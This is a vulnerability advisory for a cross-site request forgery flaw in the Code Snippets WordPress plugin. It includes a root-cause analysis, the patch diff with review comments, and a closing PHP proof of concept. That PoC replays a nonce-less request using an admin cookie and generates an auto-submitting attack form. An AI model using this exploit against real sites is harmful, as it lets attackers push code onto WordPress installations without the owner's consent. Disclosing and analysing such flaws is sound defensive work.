Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1785: Code Snippets <= 3.9.4 – Cross-Site Request Forgery to Cloud Snippet Download/Update Actions (code-snippets)

CVE ID: CVE-2026-1785
Plugin: code-snippets
Severity: Medium (CVSS 4.3)
CWE: CWE-352 (Cross-Site Request Forgery)
Vulnerable Version: 3.9.4 and earlier
Patched Version: 3.9.5
Disclosed: February 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1785:
The Code Snippets WordPress plugin version 3.9.4 and earlier contains a Cross-Site Request Forgery vulnerability in its cloud snippet management functionality. This vulnerability allows attackers to force authenticated administrators to download or update cloud snippets without their consent. The CVSS score of 4.3 reflects a medium severity issue requiring user interaction for exploitation.

Root Cause:
The vulnerability exists in the `Cloud_Search_List_Table` class within `/code-snippets/php/cloud/class-cloud-search-list-table.php`. The `process_cloud_actions()` method processes cloud snippet actions without validating a WordPress nonce. Lines 101-115 in the vulnerable version pass `$_REQUEST['action']`, `$_REQUEST['snippet']` and `$_REQUEST['source']` straight to `cloud_lts_process_download_action()` after checking only that `$_REQUEST['type']` equals 'cloud_search'. Each value is run through `sanitize_key()`, but sanitization only constrains the characters in a parameter; it says nothing about whether the request originated from the plugin's own UI. With no nonce (or any other origin check) on the download and update operations, they are reachable by CSRF.

Exploitation:
Attackers can craft a malicious web page containing an HTML form or JavaScript that automatically submits a request to the WordPress admin interface. The exploit targets the plugin's cloud search handler with the parameters `type=cloud_search`, `action=download` or `action=update`, `snippet={cloud_snippet_id}`, and `source=search` or `source=cloud`. Because the handler reads these from `$_REQUEST`, the request can be a POST form submission or a plain GET, so a link or image tag pointing at the admin URL also works without any script; the legitimate download and update buttons in 3.9.4 are themselves nonce-less GET links built with `add_query_arg()`. When a logged-in administrator visits the malicious page, the browser attaches the administrator's WordPress session cookies and the request executes with administrator privileges, downloading or updating the cloud snippet without consent.

Patch Analysis:
The patch in version 3.9.5 adds layered checks. The `process_cloud_actions()` method now returns early unless all required parameters exist, sanitizes the input values, restricts the action to 'download' or 'update', requires the snippet ID to be a positive integer (`absint()` followed by a zero check), and, most importantly, calls `check_admin_referer()` with a nonce action string bound to the specific action, source and snippet ID. That binding means a nonce minted for one download link cannot be reused to update a different snippet. Note that `check_admin_referer()` does not return on failure: it calls `wp_die()`, so the early returns above it are the only graceful exit paths. The patch also changes the URL generation in `/code-snippets/php/cloud/list-table-shared-ops.php` to wrap both the update and download links in `wp_nonce_url()`, and adds a helper, `cloud_lts_get_snippet_action_nonce_action()`, so the link builder and the handler derive the same nonce action string from the same three values.
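The root cause and the fix side by side, as an added example that is not code from the Code Snippets plugin or WordPress core. The `wp_*` functions below are stand-ins that mimic how WordPress core builds a nonce (a keyed hash over a time tick, the action string and the user ID, cut to 10 hex characters); the constant salt and user ID, the `bool` return of `wp_verify_nonce()` and the absence of the session token are simplifications. The two `process_cloud_actions_*` functions model the 3.9.4 and 3.9.5 handlers from the diff, and the driver shows a forged request going through on 3.9.4, the same request failing on 3.9.5, a genuinely nonced link succeeding, and that nonce being rejected once it is re-pointed at a different action and snippet ID:

```php
<?php
declare(strict_types=1);

// Added example, not code from the Code Snippets plugin or WordPress core.
// wp_* functions are stand-ins mimicking WordPress's nonce construction:
// HMAC over (tick | action | user id), last 12 hex chars minus 2 = 10 chars.
// Real WordPress also mixes in the session token and a site salt.

const NONCE_LIFE = 86400;          // DAY_IN_SECONDS, the WordPress default lifetime
const NONCE_SALT = 'example-salt'; // placeholder for wp_salt( 'nonce' )
const USER_ID    = 1;              // the logged-in administrator

function wp_nonce_tick(): int {
    return (int) ceil(time() / (NONCE_LIFE / 2));
}

function nonce_for_tick(int $tick, string $action): string {
    return substr(hash_hmac('md5', $tick . '|' . $action . '|' . USER_ID, NONCE_SALT), -12, 10);
}

function wp_create_nonce(string $action): string {
    return nonce_for_tick(wp_nonce_tick(), $action);
}

// As in wp_verify_nonce(), the current tick and the previous one are accepted.
function wp_verify_nonce(string $nonce, string $action): bool {
    $tick = wp_nonce_tick();
    return hash_equals(nonce_for_tick($tick, $action), $nonce)
        || hash_equals(nonce_for_tick($tick - 1, $action), $nonce);
}

function sanitize_key(string $key): string {
    return preg_replace('/[^a-z0-9_\-]/', '', strtolower($key));
}

// Nonce action string exactly as 3.9.5 builds it in list-table-shared-ops.php.
function cloud_lts_get_snippet_action_nonce_action(string $action, int $snippet_id, string $source): string {
    return sprintf('cloud-snippet-action|%s|%s|%d', $action, $source, $snippet_id);
}

// 3.9.4: any request with type=cloud_search and the three parameters is acted on.
function process_cloud_actions_vulnerable(array $request): ?string {
    if (!isset($request['type']) || 'cloud_search' !== $request['type']) {
        return null;
    }
    if (!isset($request['action'], $request['snippet'], $request['source'])) {
        return null;
    }
    return sprintf('%s snippet %s (%s)', $request['action'], $request['snippet'], $request['source']);
}

// 3.9.5: validate, then demand a nonce bound to this exact (action, id, source).
function process_cloud_actions_patched(array $request): ?string {
    if (!isset($request['type']) || 'cloud_search' !== sanitize_key($request['type'])) {
        return null;
    }
    if (!isset($request['action'], $request['snippet'], $request['source'])) {
        return null;
    }
    $action     = sanitize_key($request['action']);
    $source     = sanitize_key($request['source']);
    $snippet_id = abs((int) $request['snippet']); // absint()
    if (!in_array($action, ['download', 'update'], true) || !$snippet_id) {
        return null;
    }
    $expected = cloud_lts_get_snippet_action_nonce_action($action, $snippet_id, $source);
    if (!wp_verify_nonce((string) ($request['_wpnonce'] ?? ''), $expected)) {
        // check_admin_referer() calls wp_die() with HTTP 403 at this point.
        throw new RuntimeException("403: no nonce valid for '$expected'");
    }
    return sprintf('%s snippet %d (%s)', $action, $snippet_id, $source);
}

// Constructed requests. The forged one carries every parameter an attacker can
// guess; the victim's browser supplies the cookie, but nobody can supply a nonce.
$forged = ['type' => 'cloud_search', 'action' => 'download', 'snippet' => '123', 'source' => 'search'];
echo '3.9.4 forged:   ', process_cloud_actions_vulnerable($forged) ?? 'ignored', PHP_EOL;
try {
    process_cloud_actions_patched($forged);
} catch (RuntimeException $e) {
    echo '3.9.5 forged:   ', $e->getMessage(), PHP_EOL;
}

// A genuine click on the wp_nonce_url() link minted for (download, 123, search).
$legit = $forged + ['_wpnonce' => wp_create_nonce(cloud_lts_get_snippet_action_nonce_action('download', 123, 'search'))];
echo '3.9.5 legit:    ', process_cloud_actions_patched($legit), PHP_EOL;

// The same nonce re-pointed at another action and ID fails: the binding matters.
$replayed = ['action' => 'update', 'snippet' => '456'] + $legit; // left-hand keys win in array union
try {
    process_cloud_actions_patched($replayed);
} catch (RuntimeException $e) {
    echo '3.9.5 replayed: ', $e->getMessage(), PHP_EOL;
}
```

Running it with `php` prints the forged request as accepted by the 3.9.4 model, rejected with the 403 message by the 3.9.5 model, the nonced request accepted, and the replayed nonce rejected because the expected action string now reads `cloud-snippet-action|update|search|456`. The point to take from the replay case is that a nonce checked against a fixed string such as `cloud-snippet-action` would have protected against cross-site requests but not against a captured link being redirected at another snippet; the patch's per-tuple action string closes both.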

Impact:
Successful exploitation lets an attacker manipulate the set of snippets installed on an affected WordPress site: forcing the administrator's browser to download a cloud snippet of the attacker's choosing, or to update an existing snippet with a newer cloud version. This could lead to arbitrary code execution, backdoor installation, data theft, or site compromise if the administrator subsequently activates the downloaded snippet. The attack requires social engineering to get an administrator to visit the malicious page while authenticated to wp-admin.

Differential between vulnerable and patched code

Code Diff
--- a/code-snippets/code-snippets.php
+++ b/code-snippets/code-snippets.php
@@ -8,11 +8,11 @@
  * License:      GPL-2.0-or-later
  * License URI:  license.txt
  * Text Domain:  code-snippets
- * Version:      3.9.4
+ * Version:      3.9.5
  * Requires PHP: 7.4
  * Requires at least: 5.0
  *
- * @version   3.9.4
+ * @version   3.9.5
  * @package   Code_Snippets
  * @author    Shea Bunge <shea@codesnippets.pro>
  * @copyright 2012-2024 Code Snippets Pro
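Review bot: the version bumps to 3.9.5 but the `@copyright 2012-2024` line two lines below stays at 2024 for a release shipped in 2026; update the range in the same commit so the header block stays consistent.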
@@ -37,7 +37,7 @@
 	 *
 	 * @const string
 	 */
-	define( 'CODE_SNIPPETS_VERSION', '3.9.4' );
+	define( 'CODE_SNIPPETS_VERSION', '3.9.5' );

 	/**
 	 * The full path to the main file of this plugin.
--- a/code-snippets/php/cloud/class-cloud-search-list-table.php
+++ b/code-snippets/php/cloud/class-cloud-search-list-table.php
@@ -101,15 +101,33 @@
 		);

 		// Check request is coming from the cloud search page.
-		if ( isset( $_REQUEST['type'] ) && 'cloud_search' === $_REQUEST['type'] ) {
-				if ( isset( $_REQUEST['action'], $_REQUEST['snippet'], $_REQUEST['source'] ) ) {
-					cloud_lts_process_download_action(
-						sanitize_key( wp_unslash( $_REQUEST['action'] ) ),
-						sanitize_key( wp_unslash( $_REQUEST['source'] ) ),
-						sanitize_key( wp_unslash( $_REQUEST['snippet'] ) ),
-					);
-				}
+		if ( ! isset( $_REQUEST['type'] ) || 'cloud_search' !== sanitize_key( wp_unslash( $_REQUEST['type'] ) ) ) {
+			return;
 		}
+
+		if ( ! isset( $_REQUEST['action'], $_REQUEST['snippet'], $_REQUEST['source'] ) ) {
+			return;
+		}
+
+		$action = sanitize_key( wp_unslash( $_REQUEST['action'] ) );
+		$source = sanitize_key( wp_unslash( $_REQUEST['source'] ) );
+		$snippet_id = absint( wp_unslash( $_REQUEST['snippet'] ) );
+
+		if ( ! in_array( $action, [ 'download', 'update' ], true ) ) {
+			return;
+		}
+
+		if ( ! $snippet_id ) {
+			return;
+		}
+
+		check_admin_referer( cloud_lts_get_snippet_action_nonce_action( $action, $snippet_id, $source ) );
+
+		cloud_lts_process_download_action(
+			$action,
+			$source,
+			(string) $snippet_id,
+		);
 	}

 	/**
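Review bot: the new guard chain proves intent but not authorization; nothing in this hunk calls `current_user_can()` before `cloud_lts_process_download_action()` is reached, and a nonce is per-user, so any logged-in user who can load the cloud search screen can mint a valid nonce for themselves. If the enclosing admin page does not already gate on a capability, add a `current_user_can( ... )` check ahead of `check_admin_referer()`. Smaller point: `$source` is sanitized but, unlike `$action`, not restricted to the documented `'search'`/`'cloud'` values; a matching `if ( ! in_array( $source, [ 'search', 'cloud' ], true ) ) { return; }` would keep the validation symmetric and stop odd values reaching the nonce string.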
--- a/code-snippets/php/cloud/list-table-shared-ops.php
+++ b/code-snippets/php/cloud/list-table-shared-ops.php
@@ -10,6 +10,19 @@
 use function Code_Snippetscode_snippets;

 /**
+ * Build the nonce action string for cloud snippet state-changing operations.
+ *
+ * @param string $action    Action - 'download' or 'update'.
+ * @param int    $snippet_id Cloud snippet ID.
+ * @param string $source    Source - 'search' or 'cloud'.
+ *
+ * @return string
+ */
+function cloud_lts_get_snippet_action_nonce_action( string $action, int $snippet_id, string $source ): string {
+	return sprintf( 'cloud-snippet-action|%s|%s|%d', $action, $source, $snippet_id );
+}
+
+/**
  * Display a hidden input field for a certain column and snippet value.
  *
  * @param string        $column_name Column name.
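Review bot: the docblock documents `$source` as `'search'` or `'cloud'`, but `cloud_lts_get_snippet_action_nonce_action()` accepts any string and the handler that calls it only sanitizes `$source`; either enforce the documented set here (this function defines the nonce namespace, so it is a reasonable place) or note in the docblock that callers are responsible for it. Style: the `@param int    $snippet_id` line breaks the column alignment of the other two descriptions.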
@@ -82,15 +95,19 @@
 	$link = code_snippets()->cloud_api->get_link_for_cloud_snippet( $cloud_snippet );
 	$is_licensed = code_snippets()->licensing->is_licensed();
 	$download = $is_licensed || ! in_array( $lang, [ 'css', 'js' ], true );
+	$snippet_id = (int) $cloud_snippet->id;

 	if ( $link ) {
 		if ( $is_licensed && $link->update_available ) {
-			$update_url = add_query_arg(
-				[
-					'action'  => 'update',
-					'snippet' => $cloud_snippet->id,
-					'source'  => $source,
-				]
+			$update_url = wp_nonce_url(
+				add_query_arg(
+					[
+						'action'  => 'update',
+						'snippet' => $snippet_id,
+						'source'  => $source,
+					]
+				),
+				cloud_lts_get_snippet_action_nonce_action( 'update', $snippet_id, $source )
 			);
 			return sprintf(
 				'<li><a class="button button-primary" href="%s">%s</a></li>',
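Review bot: `add_query_arg()` is called without a base URL, so the nonced update link is built on the current request URI and inherits whatever query string the list table page already has; the handler returns early unless `type=cloud_search` is present, so confirm that parameter is part of the page URL rather than only a form field, otherwise the link will carry a valid nonce and still be ignored. Also, `wp_nonce_url()` already HTML-escapes its result, so the `href` assembled by the `sprintf` below needs no second `esc_url()`; if one is added later, watch for `&amp;` being double-encoded.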
@@ -109,7 +126,7 @@
 	if ( $download ) {
 			$download_query = [
 				'action'  => 'download',
-				'snippet' => $cloud_snippet->id,
+				'snippet' => $snippet_id,
 				'source'  => $source,
 			];

@@ -118,7 +135,10 @@
 				$download_query['cloud_page'] = (int) wp_unslash( $_REQUEST['cloud_page'] );
 			}

-			$download_url = add_query_arg( $download_query );
+			$download_url = wp_nonce_url(
+				add_query_arg( $download_query ),
+				cloud_lts_get_snippet_action_nonce_action( 'download', $snippet_id, $source )
+			);

 		$download_button = sprintf(
 			'<li><a class="button button-primary" href="%s">%s</a></li>',
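Review bot: `cloud_page` is folded into `$download_query` before `wp_nonce_url()` but deliberately left out of the nonce action string; that is correct, since pagination is not state-changing, but a one-line comment would stop a future change from "fixing" it by adding the page to `cloud_lts_get_snippet_action_nonce_action()`, which would then need a matching change in `process_cloud_actions()`. Minor: `(int) wp_unslash( $_REQUEST['cloud_page'] )` allows a negative page number into the link; `absint()` would match how `snippet` is now handled.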
--- a/code-snippets/vendor/composer/installed.php
+++ b/code-snippets/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'codesnippetspro/code-snippets',
-        'pretty_version' => 'v3.9.4',
-        'version' => '3.9.4.0',
-        'reference' => '8ee0c5cd40988c6ddfdba4d8fb67523296d84d1e',
+        'pretty_version' => 'v3.9.5',
+        'version' => '3.9.5.0',
+        'reference' => '63a360e59693c349349250023b40f2d9728b419e',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'codesnippetspro/code-snippets' => array(
-            'pretty_version' => 'v3.9.4',
-            'version' => '3.9.4.0',
-            'reference' => '8ee0c5cd40988c6ddfdba4d8fb67523296d84d1e',
+            'pretty_version' => 'v3.9.5',
+            'version' => '3.9.5.0',
+            'reference' => '63a360e59693c349349250023b40f2d9728b419e',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1785 - Code Snippets <= 3.9.4 - Cross-Site Request Forgery to Cloud Snippet Download/Update Actions

/**
 * Proof of Concept for CVE-2026-1785
 * This script demonstrates CSRF against Code Snippets plugin <= 3.9.4
 *
 * Part 1 replays the forged request directly with cURL, so it needs the
 * victim administrator's session cookie; use it to confirm that the handler
 * accepts a request carrying no nonce. Part 2 prints the real cross-site
 * vector: an auto-submitting HTML form that the victim's own browser sends,
 * attaching the WordPress auth cookies itself.
 */

// admin.php selects the plugin page from the `page` query parameter, so it
// belongs in the URL; the plugin reads the action parameters from $_REQUEST,
// so they can travel in the POST body (or equally in the query string).
$target_url   = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=code-snippets';
$admin_cookie = 'wordpress_logged_in_abc123=...'; // Replace with actual session cookie (part 1 only)

// Cloud snippet ID to target (must exist in cloud repository)
$snippet_id = 123;
$action     = 'download'; // Can be 'download' or 'update'
$source     = 'search';   // Can be 'search' or 'cloud'

// Build the malicious request parameters; note that no _wpnonce is sent
$post_data = [
    'type'    => 'cloud_search',
    'action'  => $action,
    'snippet' => $snippet_id,
    'source'  => $source,
];

// ---- Part 1: direct replay with the victim's cookie ----
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, $admin_cookie);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// HTTP 200 means the admin page rendered after the request was processed; it
// does not prove the snippet was saved, so confirm that in the Snippets list.
// Version 3.9.5 answers a nonce-less request with wp_die() (HTTP 403) from
// check_admin_referer() instead.
if ($http_code === 200) {
    echo "Request accepted (HTTP 200). Verify the result in the Snippets list.\n";
    echo "Action: $action on snippet ID: $snippet_id\n";
} else {
    echo "Request rejected or not routed. HTTP code: $http_code\n";
}

// ---- Part 2: HTML page for browser-based CSRF (host on an attacker site) ----
$form_action = htmlspecialchars($target_url, ENT_QUOTES);
echo "\n\n<!-- HTML form for browser-based CSRF -->\n";
echo "<form id='csrf-form' method='POST' action='$form_action'>\n";
echo "<input type='hidden' name='type' value='cloud_search'>\n";
echo "<input type='hidden' name='action' value='$action'>\n";
echo "<input type='hidden' name='snippet' value='$snippet_id'>\n";
echo "<input type='hidden' name='source' value='$source'>\n";
echo "</form>\n";
echo "<script>document.getElementById('csrf-form').submit();</script>\n";
